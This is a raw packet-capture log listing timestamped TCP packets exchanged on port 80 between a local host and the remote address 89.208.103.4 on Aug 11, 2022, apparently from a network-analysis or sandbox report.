Aug 11, 2022 06:57:09.280371904 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.280389071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280395985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.280426025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280462980 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280478001 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.280499935 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280536890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280555010 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.280576944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280612946 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280637026 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.280651093 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280654907 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.280690908 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.280744076 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.281121016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.281157970 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.281213999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.281569958 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.281610012 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.281625032 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.281646013 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.281647921 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.281677961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.281744957 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282111883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282152891 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282188892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282216072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282226086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282223940 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282263994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282301903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282319069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282340050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282356977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282377005 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282413960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282449961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282450914 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282458067 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282488108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282526016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282541990 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282566071 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282572985 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282603979 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282629013 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282643080 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282648087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282679081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282716036 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282732964 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282753944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282764912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.282788992 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.282843113 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.283706903 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.283780098 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.285262108 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.285301924 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.285319090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.285511971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.286303997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.286334038 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.286364079 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.286371946 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.286391973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.286396027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.286411047 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.286428928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.286451101 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.286473036 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.287381887 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.287412882 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.287441969 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.287470102 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.287472963 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.287501097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.287528992 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.287548065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.287877083 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.287908077 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.287936926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.287964106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.287969112 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.287997961 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.287997961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.288022995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.288028002 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.288038969 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.288080931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.288409948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.288438082 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.288465977 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.288467884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.288479090 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.288490057 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.288512945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.288535118 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291059971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291093111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291121960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291126966 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291150093 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291151047 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291176081 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291182041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291203976 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291210890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291232109 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291239977 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291266918 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291270971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291295052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291300058 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291321993 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291328907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291353941 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291373014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291378021 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291409016 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291646957 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291677952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291690111 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291707039 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291713953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291743994 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291757107 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291759014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291788101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291812897 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291817904 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291825056 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291843891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291847944 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291878939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291908026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291919947 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291928053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.291932106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291946888 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.291985035 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.293159962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.293250084 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.295294046 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.295330048 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.296050072 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.296309948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.296400070 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.297913074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.297952890 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.298003912 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.298013926 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.298046112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.298059940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.298084974 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.298099041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.298110008 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.298161030 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.298425913 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.298463106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.298492908 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.298501015 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.298510075 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.298541069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.298556089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.298579931 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.298593044 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.298619986 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.298634052 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.298676968 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.299451113 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.299498081 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.299527884 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.299561024 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.300483942 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.300523996 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.300564051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.300595999 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.300600052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.300631046 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.300637960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.300661087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.300674915 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.300728083 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.300961971 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.301002026 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.301064014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.301501989 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.301542044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.301579952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.301609039 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.301618099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.301634073 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.301676989 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.302063942 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302103043 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302139044 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302139997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.302176952 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302192926 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.302215099 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302232027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.302251101 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302268028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.302289009 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302313089 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.302325964 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302362919 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302377939 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.302402020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302437067 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302453995 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.302474976 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.302530050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.303297997 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303338051 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303400993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303402901 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.303437948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303491116 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.303492069 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303529978 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303555965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.303594112 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.303670883 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303709984 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303730965 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.303745985 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303782940 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303807020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.303819895 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303834915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.303858042 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.303878069 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.303911924 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.304162025 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.304200888 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.304234028 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.304254055 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.304667950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.304706097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.304734945 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.304743052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.304753065 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.304780960 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.304816961 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.304836988 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.304878950 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.305275917 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305314064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305351973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305377007 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.305389881 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305396080 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.305427074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305444956 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.305465937 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305474997 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.305502892 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305537939 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305562019 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.305577993 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305593014 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.305614948 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305653095 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.305670023 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.305692911 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.306257010 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.306297064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.306332111 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.306355953 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.306370020 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.306384087 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.306407928 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.306443930 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.306461096 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.306483030 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.306827068 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.306866884 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.306902885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.306926012 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.306953907 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.306991100 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.307009935 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.307028055 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.307044983 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.307070971 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.307384014 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.307423115 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.307481050 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.307847023 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.307885885 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.307921886 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.307946920 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.307962894 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.308002949 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.308037043 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.308038950 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.308059931 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.308077097 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.308089972 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.308114052 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.308150053 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.308166027 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.308187962 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.308193922 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.308240891 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.309447050 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.309487104 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.309523106 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.309523106 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.309557915 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.309567928 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.310997963 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.311037064 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.311074972 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.311110020 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.311110973 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.311150074 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.311155081 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.311182022 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.311188936 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.311204910 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.313646078 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.313687086 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.313724041 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.313747883 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.313759089 CEST	80	49736	89.208.103.4	192.168.2.3
Aug 11, 2022 06:57:09.313787937 CEST	49736	80	192.168.2.3	89.208.103.4
Aug 11, 2022 06:57:09.313797951 CEST	80	49736	89.208.103.4	192.168.2.3
